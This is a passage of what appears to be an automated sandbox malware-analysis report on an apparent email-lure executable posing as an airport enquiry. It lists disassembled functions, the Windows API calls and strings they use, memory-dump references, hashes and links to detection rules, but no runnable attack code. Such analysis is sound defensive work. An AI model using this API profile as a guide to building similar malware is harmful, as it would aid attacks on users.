            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D07214
            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D07217
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0723B
            • _memset.LIBCMT ref: 00D0724C
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D0725E
            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D072D6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$LongWindow_memset
            • String ID:
            • API String ID: 830647256-0
            • Opcode ID: 6e184705c4d5ec5c1e68ef9b892bfa47bfbd505cba3cb57741ffea2d3878d439
            • Instruction ID: aa66f2203c01d5e9692b85cf1ead26e1eb973b8146e6442a33f198806e17997a
            • Opcode Fuzzy Hash: 6e184705c4d5ec5c1e68ef9b892bfa47bfbd505cba3cb57741ffea2d3878d439
            • Instruction Fuzzy Hash: BB612775A04308AFDB20DFA4CC81EEE77B8EB0A714F144159FA19EB2E1D770A945DB60
            Function 00CD710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
            Download Yara Rule
            APIs
            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CD7135
            • SafeArrayAllocData.OLEAUT32(?), ref: 00CD718E
            • VariantInit.OLEAUT32(?), ref: 00CD71A0
            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CD71C0
            • VariantCopy.OLEAUT32(?,?), ref: 00CD7213
            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CD7227
            • VariantClear.OLEAUT32(?), ref: 00CD723C
            • SafeArrayDestroyData.OLEAUT32(?), ref: 00CD7249
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD7252
            • VariantClear.OLEAUT32(?), ref: 00CD7264
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD726F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
            • String ID:
            • API String ID: 2706829360-0
            • Opcode ID: 538a783e05fcd4fe566f0462861fad7a3639325db963426cf066b31bbdec39fd
            • Instruction ID: caa18b6b60aaef5a6d7f5b0077c32ba14ca3fc1bc794bfdad158253031dc2968
            • Opcode Fuzzy Hash: 538a783e05fcd4fe566f0462861fad7a3639325db963426cf066b31bbdec39fd
            • Instruction Fuzzy Hash: 2C414335900219DFCB10EFA4D884AAEBBB8FF08354F10816AF955D7761DB34E945CBA0
            Function 00CF5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
            Download Yara Rule
            APIs
            • WSAStartup.WSOCK32(00000101,?), ref: 00CF5AA6
            • inet_addr.WSOCK32(?,?,?), ref: 00CF5AEB
            • gethostbyname.WSOCK32(?), ref: 00CF5AF7
            • IcmpCreateFile.IPHLPAPI ref: 00CF5B05
            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF5B75
            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF5B8B
            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CF5C00
            • WSACleanup.WSOCK32 ref: 00CF5C06
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
            • String ID: Ping
            • API String ID: 1028309954-2246546115
            • Opcode ID: 60eab2809c273ffbc5463b926f6cbb0f20efb1c595c4ddc23b9d41d374a67f49
            • Instruction ID: 801832de487b6b7e8520502175d9823bced698fe17ab5599c2c8b812d8903baf
            • Opcode Fuzzy Hash: 60eab2809c273ffbc5463b926f6cbb0f20efb1c595c4ddc23b9d41d374a67f49
            • Instruction Fuzzy Hash: 80518F316047009FD760AF25CC89B3AB7E4EF48710F14892AF76ADB2A1DB70E900DB56
            Function 00CEB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEB73B
            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CEB7B1
            • GetLastError.KERNEL32 ref: 00CEB7BB
            • SetErrorMode.KERNEL32(00000000,READY), ref: 00CEB828
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Error$Mode$DiskFreeLastSpace
            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
            • API String ID: 4194297153-14809454
            • Opcode ID: 480b93f2bfb130b3ad76bda1107841cd07867c267056064209cd227c5c2751f2
            • Instruction ID: 785018cb0af77d8e55e9c103358d15c582b9729de0cac0e0512e885297fafb56
            • Opcode Fuzzy Hash: 480b93f2bfb130b3ad76bda1107841cd07867c267056064209cd227c5c2751f2
            • Instruction Fuzzy Hash: 5131E135A002089FDB10EF6AC885ABF7BB8EF48700F144029F516D7291DB71AE42DBA1
            Function 00CD9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CD94F6
            • GetDlgCtrlID.USER32 ref: 00CD9501
            • GetParent.USER32 ref: 00CD951D
            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD9520
            • GetDlgCtrlID.USER32(?), ref: 00CD9529
            • GetParent.USER32(?), ref: 00CD9545
            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CD9548
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CtrlParent$ClassName_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 1536045017-1403004172
            • Opcode ID: cbd35954a42cf9db0bc0ec87076dd739f81c90f1e82c80a350c3712990e9f281
            • Instruction ID: d449af66f906090149e9320f0e11d0c36eccf8b9f4f6934f2b7c1a502c88ce20
            • Opcode Fuzzy Hash: cbd35954a42cf9db0bc0ec87076dd739f81c90f1e82c80a350c3712990e9f281
            • Instruction Fuzzy Hash: 6921C474900204BBCF05AFA5CC85EFEBB74EF45310F604226B661973E2DB759919EB20
            Function 00CD955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CD95DF
            • GetDlgCtrlID.USER32 ref: 00CD95EA
            • GetParent.USER32 ref: 00CD9606
            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD9609
            • GetDlgCtrlID.USER32(?), ref: 00CD9612
            • GetParent.USER32(?), ref: 00CD962E
            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CD9631
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CtrlParent$ClassName_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 1536045017-1403004172
            • Opcode ID: 33df11be0907cf81a8a4100cec5127f218684bc0284939d516771ef992f1d54e
            • Instruction ID: 63a3ef4672ef55410f3af88995453dde589e47157503e8f8c65fe54b485782d4
            • Opcode Fuzzy Hash: 33df11be0907cf81a8a4100cec5127f218684bc0284939d516771ef992f1d54e
            • Instruction Fuzzy Hash: 7B21C874900204BBDF15AB61CCC5EFEBB74EF44300F500116F621973A1DB75991AEB20
            Function 00CD9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32 ref: 00CD9651
            • GetClassNameW.USER32(00000000,?,00000100), ref: 00CD9666
            • _wcscmp.LIBCMT ref: 00CD9678
            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CD96F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameParentSend_wcscmp
            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
            • API String ID: 1704125052-3381328864
            • Opcode ID: a6c20717d5bc78fc386e122f1d9f4223979f35c969561387d654d28c1d93f4e6
            • Instruction ID: c287b0d07618a7164503a9dac3c7658ea0b6ae08c2ab92787ce26aa77470a467
            • Opcode Fuzzy Hash: a6c20717d5bc78fc386e122f1d9f4223979f35c969561387d654d28c1d93f4e6
            • Instruction Fuzzy Hash: 6C113A7B248343BAF6112621DC27DA6B79CCB01324F200127FB10E51E1FEB2EA425A68
            Function 00CF8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CF8BEC
            • CoInitialize.OLE32(00000000), ref: 00CF8C19
            • CoUninitialize.OLE32 ref: 00CF8C23
            • GetRunningObjectTable.OLE32(00000000,?), ref: 00CF8D23
            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CF8E50
            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D12C0C), ref: 00CF8E84
            • CoGetObject.OLE32(?,00000000,00D12C0C,?), ref: 00CF8EA7
            • SetErrorMode.KERNEL32(00000000), ref: 00CF8EBA
            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CF8F3A
            • VariantClear.OLEAUT32(?), ref: 00CF8F4A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
            • String ID:
            • API String ID: 2395222682-0
            • Opcode ID: af7b1bcb30527e515f42ffced28da45a678e242ac03bd9981dcc20fe018445cb
            • Instruction ID: bae85ebd3dc40c43ce7f59885445df92941c6e230d98e3f3d20bec7d657300a1
            • Opcode Fuzzy Hash: af7b1bcb30527e515f42ffced28da45a678e242ac03bd9981dcc20fe018445cb
            • Instruction Fuzzy Hash: ACC13571204309AFD740EF64C884A6AB7E9FF88748F10491DF68ADB251DB71ED49CB62
            Function 00CE4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
            Download Yara Rule
            APIs
            • __swprintf.LIBCMT ref: 00CE419D
            • __swprintf.LIBCMT ref: 00CE41AA
              • Part of subcall function 00CA38D8: __woutput_l.LIBCMT ref: 00CA3931
            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CE41D4
            • LoadResource.KERNEL32(?,00000000), ref: 00CE41E0
            • LockResource.KERNEL32(00000000), ref: 00CE41ED
            • FindResourceW.KERNEL32(?,?,00000003), ref: 00CE420D
            • LoadResource.KERNEL32(?,00000000), ref: 00CE421F
            • SizeofResource.KERNEL32(?,00000000), ref: 00CE422E
            • LockResource.KERNEL32(?), ref: 00CE423A
            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CE429B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
            • String ID:
            • API String ID: 1433390588-0
            • Opcode ID: f9be9ea416586cbed16a3dc42e84bb4f3145368ba6c5602b5c3b4dfbcd416d5e
            • Instruction ID: 960b2126122d81c15bd55790bbae0e4f6b318df27d03fdd83385f855f73cce66
            • Opcode Fuzzy Hash: f9be9ea416586cbed16a3dc42e84bb4f3145368ba6c5602b5c3b4dfbcd416d5e
            • Instruction Fuzzy Hash: 7E31DE71A0128AABCB15DF62DC48EBF7BACEF09301F104425FA15E6250E734DA119BB4
            Function 00CE16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00CE1700
            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1714
            • GetWindowThreadProcessId.USER32(00000000), ref: 00CE171B
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE172A
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CE173C
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1755
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1767
            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17AC
            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17C1
            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17CC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
            • String ID:
            • API String ID: 2156557900-0
            • Opcode ID: d9eda55e40e0f11bb7986eb8aa90c70f2f0ef4c185cfe27593de253e20decd87
            • Instruction ID: 90ddb54b6fd8b3092b359d7d02d6662c38301d26e373606e3b171c55c75db82b
            • Opcode Fuzzy Hash: d9eda55e40e0f11bb7986eb8aa90c70f2f0ef4c185cfe27593de253e20decd87
            • Instruction Fuzzy Hash: AE31BF79600344BBEB21DF16DC84B693BA9EF5AB51F254028FC14C63A0DB709E448B70
            Function 00C8FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
            Download Yara Rule
            APIs
            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C8FC06
            • OleUninitialize.OLE32(?,00000000), ref: 00C8FCA5
            • UnregisterHotKey.USER32(?), ref: 00C8FDFC
            • DestroyWindow.USER32(?), ref: 00CC4A00
            • FreeLibrary.KERNEL32(?), ref: 00CC4A65
            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CC4A92
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
            • String ID: close all
            • API String ID: 469580280-3243417748
            • Opcode ID: 936f17f2a77ebf2d409ec5975f853dda2c93ac5c4ecc97592c93b09ce90c0a39
            • Instruction ID: 173f9ca908fae557daa0679a131d51a14615102205f5e5e465a1bdc2dbb3a124
            • Opcode Fuzzy Hash: 936f17f2a77ebf2d409ec5975f853dda2c93ac5c4ecc97592c93b09ce90c0a39
            • Instruction Fuzzy Hash: 93A17C347012128FCB28EF55C4A5F69F7A4AF04704F1482ADE91AAB251DB30EE17EF58
            Function 00CDA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
            Download Yara Rule
            APIs
            • EnumChildWindows.USER32(?,00CDAA64), ref: 00CDA9A2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ChildEnumWindows
            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
            • API String ID: 3555792229-1603158881
            • Opcode ID: 61f13547f39a36b3cc15fe95794db42dcf3e486b445cb81f3a2f60623dfa34a1
            • Instruction ID: dcb0366d9c69b2152a85f8cc4acb0af08b8c209687ee67bc324a2792c4099a15
            • Opcode Fuzzy Hash: 61f13547f39a36b3cc15fe95794db42dcf3e486b445cb81f3a2f60623dfa34a1
            • Instruction Fuzzy Hash: 6891EA71A00506DBDB08DF70C491BEDFB75BF04304F50811AE999A7351DF30AA59DBA1
            Function 00C82E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,000000EB), ref: 00C82EAE
              • Part of subcall function 00C81DB3: GetClientRect.USER32(?,?), ref: 00C81DDC
              • Part of subcall function 00C81DB3: GetWindowRect.USER32(?,?), ref: 00C81E1D
              • Part of subcall function 00C81DB3: ScreenToClient.USER32(?,?), ref: 00C81E45
            • GetDC.USER32 ref: 00CBCF82
            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CBCF95
            • SelectObject.GDI32(00000000,00000000), ref: 00CBCFA3
            • SelectObject.GDI32(00000000,00000000), ref: 00CBCFB8
            • ReleaseDC.USER32(?,00000000), ref: 00CBCFC0
            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CBD04B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
            • String ID: U
            • API String ID: 4009187628-3372436214
            • Opcode ID: 5a97d548cdcb18c865f715d2638f664adebb69a226faa888905298ad8e80c532
            • Instruction ID: 6b6e221ab06499f1fa2d0e4f22289484f6c39e6ab0532c4a62569efb747d044c
            • Opcode Fuzzy Hash: 5a97d548cdcb18c865f715d2638f664adebb69a226faa888905298ad8e80c532
            • Instruction Fuzzy Hash: 1471E530400205DFCF21EF64C884AFA3BB5FF49365F1442AAED669A2A5D7318D41DB65
            Function 00D0C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
              • Part of subcall function 00C82344: GetCursorPos.USER32(?), ref: 00C82357
              • Part of subcall function 00C82344: ScreenToClient.USER32(00D467B0,?), ref: 00C82374
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000001), ref: 00C82399
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00D0C2E4
            • ImageList_EndDrag.COMCTL32 ref: 00D0C2EA
            • ReleaseCapture.USER32 ref: 00D0C2F0
            • SetWindowTextW.USER32(?,00000000), ref: 00D0C39A
            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D0C3AD
            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00D0C48F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
            • String ID: @GUI_DRAGFILE$@GUI_DROPID
            • API String ID: 1924731296-2107944366
            • Opcode ID: 9c41dfe878090fe977207a561ed8235c3c1eb121ab83d34adcc63b691e5f36e7
            • Instruction ID: 3ba02261a28f80ad42f08f1a39300a1be0447ede19d3c8c0133d7f9df7875db8
            • Opcode Fuzzy Hash: 9c41dfe878090fe977207a561ed8235c3c1eb121ab83d34adcc63b691e5f36e7
            • Instruction Fuzzy Hash: E6519D74204300AFD714EF10C895FAA77E4FB89314F14461DF596872E1DB71E948DB62
            Function 00CF8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
            Download Yara Rule
            APIs
